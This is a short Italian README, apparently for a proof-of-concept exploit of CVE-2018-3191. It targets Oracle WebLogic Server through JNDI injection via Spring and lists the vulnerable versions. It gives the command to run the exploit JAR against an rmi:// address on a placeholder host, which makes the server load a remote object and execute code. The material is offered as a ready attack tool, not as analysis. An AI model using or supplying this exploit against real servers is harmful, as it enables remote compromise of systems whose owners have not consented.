
Exploit proof-of-concept per CVE-2018-3191 che mira a WebLogic Server tramite iniezione JNDI. Fornisce un payload JAR per attivare remote code execution tramite Spring JNDI.
Utilizzo:
java -jar weblogic-spring-jndi.jar <jndi_address>
Esempio:
java -jar weblogic-spring-jndi.jar rmi://<IP>:1099/Object
Nota:
12.2.1.3
10.3.6.0
12.2.1.0
12.1.3.0
12.2.1.1